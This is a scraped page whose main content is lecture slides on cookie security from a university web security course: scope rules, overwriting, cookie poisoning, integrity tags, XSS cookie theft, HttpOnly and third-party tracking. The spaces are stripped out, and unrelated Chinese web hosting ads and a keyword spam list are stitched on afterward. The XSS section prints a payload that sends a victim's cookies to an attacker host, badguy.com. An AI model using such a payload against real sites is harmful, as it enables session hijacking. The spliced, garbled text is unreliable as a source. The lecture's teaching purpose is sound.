overwritesphpecho

phpecho  时间:2021-05-20  阅读:()
CookieSameOriginPolicyDanBonehCS142Winter2009Monday:sessionmanagementusingcookiesSameoriginpolicy:"highlevel"Review:SameOriginPolicy(SOP)forDOM:OriginAcanaccessoriginB'sDOMifmatchon(scheme,domain,port)Today:SameOriginalPolicy(SOP)forcookies:Generallyspeaking,basedon:([scheme],domain,path)optionalscheme://domain:port/pathparamsscopeSetting/deletingcookiesbyserverDeletecookiebysetting"expires"todateinpastDefaultscopeisdomainandpathofsettingURLBrowserServerGET…HTTPHeader:Set-cookie:NAME=VALUE;domain=(whentosend);path=(whentosend)secure=(onlysendoverSSL);expires=(whenexpires);HttpOnly(later)ifexpires=NULL:thissessiononlyScopesettingrules(writeSOP)domain:anydomain-suffixofURL-hostname,exceptTLDexample:host="login.
site.
com"login.
site.
comcansetcookiesforallof.
site.
combutnotforanothersiteorTLDProblematicforsiteslike.
stanford.
edupath:canbesettoanythingalloweddomainslogin.
site.
com.
site.
comdisalloweddomainsuser.
site.
comothersite.
com.
comCookiesareidentifiedby(name,domain,path)Bothcookiesstoredinbrowser'scookiejar;bothareinscopeoflogin.
site.
comcookie1name=useridvalue=testdomain=login.
site.
compath=/securecookie2name=useridvalue=test123domain=.
site.
compath=/securedistinctcookiesReadingcookiesonserver(readSOP)BrowsersendsallcookiesinURLscope:cookie-domainisdomain-suffixofURL-domain,andcookie-pathisprefixofURL-path,and[protocol=HTTPSifcookieis"secure"]Goal:serveronlyseescookiesinitsscopeBrowserServerGET//URL-domain/URL-pathCookie:NAME=VALUEExampleshttp://checkout.
site.
com/http://login.
site.
com/https://login.
site.
com/cookie1name=useridvalue=u1domain=login.
site.
compath=/securecookie2name=useridvalue=u2domain=.
site.
compath=/non-securebothsetbylogin.
site.
comcookie:userid=u2cookie:userid=u2cookie:userid=u1;userid=u2(arbitraryorder)Clientsideread/write:document.
cookieSettingacookieinJavascript:document.
cookie="name=value;expires=…;"Readingacookie:alert(document.
cookie)printsstringcontainingallcookiesavailablefordocument(basedon[protocol],domain,path)Deletingacookie:document.
cookie="name=;expires=Thu,01-Jan-70"document.
cookieoftenusedtocustomizepageinJavascriptjavascript:alert(document.
cookie)JavascriptURLDisplaysallcookiesforcurrentdocumentViewing/deletingcookiesinBrowserUICookieprotocolproblemsServerisblind:Doesnotseecookieattributes(e.
g.
secure)DoesnotseewhichdomainsetthecookieServeronlysees:Cookie:NAME=VALUEExample1:loginserverproblemsAlicelogsinatlogin.
site.
comlogin.
site.
comsetssession-idcookiefor.
site.
comAlicevisitsevil.
site.
comoverwrites.
site.
comsession-idcookiewithsession-idofuser"badguy"Alicevisitscs142hw.
site.
comtosubmithomework.
cs142hw.
site.
comthinksitistalkingto"badguy"Problem:cs142hwexpectssession-idfromlogin.
site.
com;cannottellthatsession-idcookiewasoverwrittenExample2:"secure"cookiesarenotsecureAlicelogsinathttps://www.
google.
com/accountsAlicevisitshttp://www.
google.
com(cleartext)NetworkattackercaninjectintoresponseSet-Cookie:LSID=badguy;secureandoverwritesecurecookieProblem:networkattackercanre-writeHTTPScookies!
HTTPScookievaluecannotbetrustedInteractionwiththeDOMSOPCookieSOP:pathseparationx.
com/Adoesnotseecookiesofx.
com/BNotasecuritymeasure:DOMSOP:x.
com/AhasaccesstoDOMofx.
com/Balert(frames[0].
document.
cookie);Pathseparationisdoneforefficiencynotsecurity:x.
com/AisonlysentthecookiesitneedsCookieshavenointegrity!
!
Storingsecuritydataonbrowser–Usercanchangeanddeletecookievalues!
!
Editcookiefile(FF3:cookies.
sqlite)ModifyCookieheader(FF:TamperDataextension)–Sillyexample:shoppingcartsoftwareSet-cookie:shopping-cart-total=150($)–Usereditscookiefile(cookiepoisoning):Cookie:shopping-cart-total=15($)Similartoproblemwithhiddenfields1617Notsosilly…(asof2/2000)D3.
COMPtyLtd:ShopFactory5.
8@RetailCorporation:@RetailAdgrafix:CheckItOutBaronConsultingGroup:WebSiteToolComCityCorporation:SalesCartCrestedButteSoftware:EasyCartDansie.
net:DansieShoppingCartIntelligentVendingSystems:IntellivendMake-a-Store:Make-a-StoreOrderPageMcMurtrey/Whitaker&Associates:Cart323.
0pknutsen@nethut.
no:CartMan1.
04RichMediaTechnologies:JustAddCommerce5.
0SmartCart:SmartCartWebExpress:Shoptron1.
2Source:http://xforce.
iss.
net/xforce/xfdb/4621Solution:cryptographicchecksums"value"shouldalsocontaindatatopreventcookiereplayandswapGoal:dataintegrityRequiressecretkeykunknowntobrowserBrowserServerkSet-Cookie:NAME=valueTCookie:NAME=valueTGeneratetag:T←F(k,value)Verifytag:T=F(k,value)19Example:.
NET2.
0–System.
Web.
Configuration.
MachineKeySecretwebserverkeyintendedforcookieprotectionStoredonallwebserversinsiteCreatinganencryptedcookiewithintegrity:–HttpCookiecookie=newHttpCookie(name,val);HttpCookieencodedCookie=HttpSecureCookie.
Encode(cookie);Decryptingandvalidatinganencryptedcookie:–HttpSecureCookie.
Decode(cookie);Cookietheft:basiccrosssitescripting(XSS)Example:reflectedXSSsearchfieldonvictim.
com:http://victim.
com/search.
phpterm=appleServer-sideimplementationofsearch.
php:SearchResultsResultsfor:.
.
.
echosearchtermintoresponseBadinputConsiderlink:(properlyURLencoded)http://victim.
com/search.
phpterm=window.
open("http://badguy.
comcookie="+document.
cookie)Whatifuserclicksonthislink1.
Browsergoestovictim.
com/search.
php2.
Victim.
comreturnsResultsfor…3.
Browserexecutesscript:Sendsbadguy.
comcookieforvictim.
com23SowhatWhywoulduserclickonsuchalinkPhishingemailLinkindoubleclickbannerad…manymanywaystofooluserintoclickingMANYotherformsofXSS(monday)ManydonotrequireclickingonlinksHttpOnlyCookiesIE6SP1,FF2.
0.
0.
5BrowserServerGET…HTTPHeader:Set-cookie:NAME=VALUE;HttpOnlyCookiesentoverHTTP(s),butnotaccessibletoscriptscannotbereadviadocument.
cookieAlsoblocksaccessfromXMLHttpRequestheadersHelpspreventcookietheftviaXSS…butdoesnotstopmostotherrisksofXSSbugs.
(notSafari)THEEND3rdPartyCookies:usertracking3rdpartycookiesWhattheyare:UsergoestositeA.
com;obtainspagePagecontainsBrowsergoestoB.
com;obtainspageHTTPresponsecontainscookieCookiefromB.
comiscalleda3rdpartycookieTracking:UsergoestositeD.
comD.
comcontainsB.
comobtainscookiesetwhenvisitedA.
comB.
comknowsuservisitedA.
comandD.
comCanweblock3rdpartycookiesIEandSafari:blockset/writeIgnorethe"Set-Cookie"HTTPheaderfrom3rdpartiesSitesetscookieasa1stparty;willbegivencookiewhencontactedasa3rdpartyEnabledbydefaultinIE7FirefoxandOpera:blocksend/readAlwaysimplement"Set-Cookie",butneversendcookiesto3rdpartyBreakssess.
mgmt.
atseveralsites(offbydefault)Effectivenessof3rdpartyblockingIneffectiveforimprovingprivacy3rdpartycanbecomefirstpartyandthensetcookieFlashcookiesnotcontrolledbybrowsercookiepolicyIE8InPrivatebrowsingandChromeincognitoUponexit,deleteallbrowserstatecollectedwhileinprivatebrowsing
展开全文

零途云月付31.9元起,香港cn2 gia线路

零途云是一家香港公司,主要产品香港cn2 gia线路、美国Cera线路云主机,美国CERA高防服务器,日本CN2直连服务器;同时提供香港多ip站群云服务器。即日起,购买香港/美国/日本云服务器享受9折优惠,新用户有优惠码:LINGTUYUN,使用即可打折。目前,零途云还推出性价比非常高香港多ip站群云服务器,有需要的,可以关注一下。零途云优惠码:优惠码:LINGTUYUN (新用户优惠,享受9折优...

Sharktech:鲨鱼机房1Gbps无限流量美国服务器;丹佛$49/月起,洛杉矶$59/月起

sharktech怎么样?sharktech鲨鱼机房(Sharktech)我们也叫它SK机房,是一家成立于2003年的老牌国外主机商,提供的产品包括独立服务器租用、VPS主机等,自营机房在美国洛杉矶、丹佛、芝加哥和荷兰阿姆斯特丹等,主打高防产品,独立服务器免费提供60Gbps/48Mpps攻击防御。机房提供1-10Gbps带宽不限流量服务器,最低丹佛/荷兰机房每月49美元起,洛杉矶机房最低59美元...

美得云(20元)香港特价将军澳CTG+CN2云服务器

美得云成立于2021年,是一家云产品管理服务商(cloud)专业提供云计算服务、DDOS防护、网络安全服务、国内海外数据中心托管租用等业务、20000+用户的选择,43800+小时稳定运行香港特价将军澳CTG+CN2云服务器、采用高端CPU 优质CN2路线 SDD硬盘。香港CTG+CN22核2G3M20G数据盘25元点击购买香港CTG+CN2​2核2G5M30G数据盘39元点击购买香港CTG+CN...

phpecho为你推荐
Taiwanios10请仔细阅读在本报告尾部的重要法律声明legraph计划ipad支持ipad支持ipad支持ipadwin7telnetWin7系统中的telnet命令如何应用?x-routerx-arcsinx的等价无穷小是什么?phpemptyphp中 isset函数有什么功能
中文域名查询 抗投诉vps主机 科迈动态域名 cn域名个人注册 狗爹 Dedicated 视频存储服务器 la域名 permitrootlogin 大容量存储 jsp空间 免费个人空间 qq云端 中国电信网络测速 数据库空间 网站加速 带宽测试 七十九刀 香港博客 服务器操作系统 更多
赞助商
套餐 网络 数据库 亚当 双核 流量 半价 邦联 台湾 页面 越南 荷兰 亚特兰大 防御 迁移 沙田 芝加哥 数据 服务器 港元 美国洛杉矶 德国 证书 挪威 挂机 硬盘 安装 重新安装 新加坡 美国 何塞 联通 免费版 华纳 菲律宾 中国 英国 西伯利亚 计费 西雅图 面板 域名 罗马尼亚 阿里 港币 带宽 虚拟主机 加利福尼亚州 公网 摩尔多瓦